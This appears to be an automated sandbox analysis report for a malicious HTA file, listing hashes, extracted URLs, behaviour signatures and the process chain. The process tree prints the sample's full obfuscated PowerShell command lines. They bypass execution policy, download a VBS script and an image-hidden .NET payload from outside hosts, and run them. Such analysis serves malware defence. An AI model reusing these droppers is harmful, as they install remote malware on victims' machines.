Analysis
-
max time kernel
14s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
17-12-2024 04:17
Behavioral task
behavioral1
Sample
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta
Resource
win10v2004-20241007-en
General
-
Target
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta
-
Size
144KB
-
MD5
5215d83b478d7a718062863c5efbbeeb
-
SHA1
9ac735295a8b3bc10740d50669f6fa5c81ae10ce
-
SHA256
af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80
-
SHA512
b1ea72019653fa7858aa1b6ad1fa3fcf6974ade703be0edd55f891030706fc675425e5f1372dc3a61671dff5e40e6baceba019af60711cd65a248f7cecbca915
-
SSDEEP
768:t1EZFxaTOum2oum2M5KUJDVUKhCbGVf/AMF9woN83WkkA7MhrkK0IHj66666666l:tg
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg%20
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2484 powershell.exe 6 2004 powershell.exe 8 2004 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2484 powershell.exe 1248 cmd.exe -
pid Process 2004 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2484 powershell.exe 2004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2580 wrote to memory of 1248 2580 mshta.exe 29 PID 2580 wrote to memory of 1248 2580 mshta.exe 29 PID 2580 wrote to memory of 1248 2580 mshta.exe 29 PID 2580 wrote to memory of 1248 2580 mshta.exe 29 PID 1248 wrote to memory of 2484 1248 cmd.exe 31 PID 1248 wrote to memory of 2484 1248 cmd.exe 31 PID 1248 wrote to memory of 2484 1248 cmd.exe 31 PID 1248 wrote to memory of 2484 1248 cmd.exe 31 PID 2484 wrote to memory of 3016 2484 powershell.exe 32 PID 2484 wrote to memory of 3016 2484 powershell.exe 32 PID 2484 wrote to memory of 3016 2484 powershell.exe 32 PID 2484 wrote to memory of 3016 2484 powershell.exe 32 PID 3016 wrote to memory of 2972 3016 csc.exe 33 PID 3016 wrote to memory of 2972 3016 csc.exe 33 PID 3016 wrote to memory of 2972 3016 csc.exe 33 PID 3016 wrote to memory of 2972 3016 csc.exe 33 PID 2484 wrote to memory of 2184 2484 powershell.exe 35 PID 2484 wrote to memory of 2184 2484 powershell.exe 35 PID 2484 wrote to memory of 2184 2484 powershell.exe 35 PID 2484 wrote to memory of 2184 2484 powershell.exe 35 PID 2184 wrote to memory of 2004 2184 WScript.exe 36 PID 2184 wrote to memory of 2004 2184 WScript.exe 36 PID 2184 wrote to memory of 2004 2184 WScript.exe 36 PID 2184 wrote to memory of 2004 2184 WScript.exe 36
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af6c6b710e9a4c5e2d8b53642779548a4edcd528cd7e5714c6ac9d69f38efb80.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2580 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWERSHELL.Exe -Ex byPasS -nOp -w 1 -c DEvIceCRedeNtiAldEPLOYmeNt ; InVokE-exPREsSiOn($(inVoKe-EXPResSiOn('[SysteM.Text.encOding]'+[chaR]58+[CHAr]0x3A+'UtF8.GeTsTriNg([SYSTEm.convERT]'+[cHar]58+[chAR]58+'FRoMbaSE64stRinG('+[CHaR]0x22+'JERjRkpzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFUmRFRklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcm0sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJpSUZxTmtqbCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkZoc0dSLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSE1KaGh1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB4a0IpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIllQIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cdxqt52k.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E16.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7E15.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2972
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $panton = 'JHRvc2luZXNzID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R6dmFpODZ1aC9pbWFnZS91cGxvYWQvdjE3MzQzMTUyNDQvbTNndGJxa3R2bm9jeXZtNDEwYWEuanBnICc7JGNhbHljZXMgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRjeW1iYWwgPSAkY2FseWNlcy5Eb3dubG9hZERhdGEoJHRvc2luZXNzKTskYm9hcnRzID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGN5bWJhbCk7JG1pc3RlbXBlciA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbGluZ3VsaWZlcm91cyA9ICc8PEJBU0U2NF9FTkQ+Pic7JHRyaWNoaW5lbGxvc2lzID0gJGJvYXJ0cy5JbmRleE9mKCRtaXN0ZW1wZXIpOyRzdWJ0b3JyaWQgPSAkYm9hcnRzLkluZGV4T2YoJGxpbmd1bGlmZXJvdXMpOyR0cmljaGluZWxsb3NpcyAtZ2UgMCAtYW5kICRzdWJ0b3JyaWQgLWd0ICR0cmljaGluZWxsb3NpczskdHJpY2hpbmVsbG9zaXMgKz0gJG1pc3RlbXBlci5MZW5ndGg7JGludGVyc3RpdGlhID0gJHN1YnRvcnJpZCAtICR0cmljaGluZWxsb3Npczskc2hhaWsgPSAkYm9hcnRzLlN1YnN0cmluZygkdHJpY2hpbmVsbG9zaXMsICRpbnRlcnN0aXRpYSk7JHZpbnlsYmVuemVuZSA9IC1qb2luICgkc2hhaWsuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHNoYWlrLkxlbmd0aCldOyRtZWxpcGhhZ2lkYW4gPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR2aW55bGJlbnplbmUpOyRvcm9nZW4gPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRtZWxpcGhhZ2lkYW4pOyRtZWFzbHkgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskbWVhc2x5Lkludm9rZSgkbnVsbCwgQCgnMC9CTWRnVC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJHBhcnZhbmltaXR5JywgJyRwYXJ2YW5pbWl0eScsICckcGFydmFuaW1pdHknLCAnQ2FzUG9sJywgJyRwYXJ2YW5pbWl0eScsICckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCckcGFydmFuaW1pdHknLCcxJywnJHBhcnZhbmltaXR5JywnVGFza05hbWUnKSk7';$stratagemical = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($panton));Invoke-Expression $stratagemical5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD50bd6d56a74be8a19f055a05a6e923baa
SHA16c9c1fcd77398ba4b761627f2a8c3faff21f6817
SHA256595844ac757a097ad48239062b7c42969af4ec38ee3e49874673bf2a4080791b
SHA5124bb317b99b2b0f26e822a01a779f3f982387177f2d480a619c7d87201e8969ebad74ae8fcc9d7f58fcbf8ea2adb64afa5370dbbc103cc8b6800945e1ba860c2b
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD558b628c177a7896b91ed182ebaa35469
SHA188aa416a1c51152be5437584ada6ab43e1e6237a
SHA25650f54d6cbb0fb503043398de98e5ed85872c39f4911cdca4dbbfaf0e87f9d008
SHA512f06fea6277996229d17b1efb1bce1ad859a981ac1ad5937f4565351170385b988310008c06eb5aa70e199c05ed9daaf07a180b7767703e111087c0da8a55d96a
-
Filesize
7KB
MD558075fb9c0311fd8b88827ae5d3e1f2e
SHA1fa7ed76114514c565fb0704e1ed8659f0fdb7044
SHA2569e5cf2d94bd482b15b99a780e921034d0ed54c98f7fdb5458f122075f5c21403
SHA512fcc4edc913c85195622e36d3c8bc806d86b0b15869deda5d3ce23e3a8123fdd15b364876c8a4e29b565af1b7e44123982fc4afedc5ffc90e20026e3e0b8e233e
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD51437f322d41709a34f7b3968918c4c10
SHA12e97393fcafec491d714edd5cbe1cde30f3fbb62
SHA25688ad614931792740e7ef560f45233280e23b30875e3f5d8b90f9e451d2549015
SHA512537f8f579fea393a58da98967da8ecbd71ad7383ad298a256041f12bff9f4c8a995821ebb42dcb0341f90527129558e41b31072ad8a40951bf37686e5c589100
-
Filesize
150KB
MD57a539179ea126613a4c2c9d1bee31c52
SHA111d431b7c5b338835fe64d754d04c6d9c10e793a
SHA256744148cb1c99cde05d4e16839fc8bf5a661dc6072209aaaf19250b64899e5189
SHA512a6e807f4e03115a7f6b000464f042ce1d4a5e55c24515b6f526f36ba54d49202dcbbd67f2a16295ff2ffc62f855463a905c5d670aed70483f032f168b91f096c
-
Filesize
652B
MD526bc20a577158b89c1fb5321826ff034
SHA13730cc0493318f5344391bb58b293b26dce3f26e
SHA256eedbb4cb1295cfbbc6c9b2cdea6b82289fd51494102204491203e15e2d313299
SHA5126d5fd02c371a6fc47fd0d3d1a97106ac15b31b3af6840cbf571c9ea2036ac6e54e90f73ab76bfceb1e13d4b5297471bebbeb66643de98f6f512d9759648364f4
-
Filesize
475B
MD50c431e10cf228fe2c475697b04ff0ebb
SHA104439e5d97e5c2e03f57caf24564925b32d644cb
SHA256f0514c83d3a0460e90e267fbb96546f4b5890906eb7ea94799c38ec743fb91ae
SHA512954a57476daa5408f0ff679972741e63e8fe61ff20bdefc40b83ad6ff633b0a7d5d3ddce7cfaff0a5ff0bc2300704f6c5639adbf44f38a818d22644814e5efcb
-
Filesize
309B
MD5305e97ac13e0575681e49ec13fa60ddb
SHA11087a816e6d01e115858a618044eada777a21587
SHA25693cff63f2e354762c1e5e3c69146e7cfc19c8d03102b7556dfa7bff0ce2955c5
SHA5129c7a7fd1441c33485ecb952f016aa91ea579fce891fcad87b5577373ef481d6a1d59aa0a689cdbc4fea966e5b893dd6b5d4f0269cb00da77d69f9a9a31da79f4